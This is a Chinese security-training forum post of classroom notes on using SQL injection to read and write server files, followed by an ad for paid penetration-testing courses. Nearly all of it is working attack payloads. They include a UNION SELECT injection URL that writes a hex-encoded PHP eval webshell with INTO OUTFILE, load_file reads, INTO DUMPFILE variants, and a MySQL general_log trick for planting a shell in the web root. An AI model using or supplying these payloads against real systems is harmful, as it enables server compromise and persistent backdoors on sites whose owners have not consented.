请选择 进入手机版 | 继续访问电脑版

女黑客安全网-零基础入门网络安全学习-渗透测试零基础入门学习

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 1878|回复: 0

SQL注入读写文件,课堂代码实录

[复制链接]

127

主题

142

帖子

1134

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
1134
发表于 2018-7-2 17:40:48 | 显示全部楼层 |阅读模式
1,写入webshell
http://172.18.199.248/01-cookie/selectarticle.php?id=-1 union select 1,2,0x3C3F706870206576616C28245F504F53545B315D293F3E,4,5 into outfile 'C:\\xampp\\htdocs\\01-cookie\\conn.php'

2,读取webshell
http://172.18.199.248/01-cookie/selectarticle.php?id=-1 union select 1,2,load_file(0x433A5C5C78616D70705C5C6874646F63735C5C30312D636F6F6B69655C5C31322E706870),4,5
配置my.ini 设置可以读写任何地方
secure-file-priv=



3,sql注入写文件都有哪些函数?
    select '一句话' into outfile '路径'
    select '一句话' into dumpfile '路径'
    select '<?php eval($_POST[1]) ?>' into dumpfile  'd:\\wwwroot\baidu.com\nvhack.php';

4.通过数据库日志写shell outfile被禁止,或者写入文件被拦截;
在数据库中操作如下:(必须是root权限)   
show variables like '%general%';  #查看配置
set global general_log = on;  #开启general log模式
set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址
select '<?php eval($_POST[cmd]);?>

4.遇见其他拦截用;过滤后面的语句



必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:18622800700,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网-零基础入门网络安全学习-渗透测试零基础入门学习 ( 津ICP备17008032号-3 )版权所有:一极(天津)安全技术服务有限公司

GMT+8, 2019-8-19 00:12 , Processed in 0.023647 second(s), 20 queries .

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表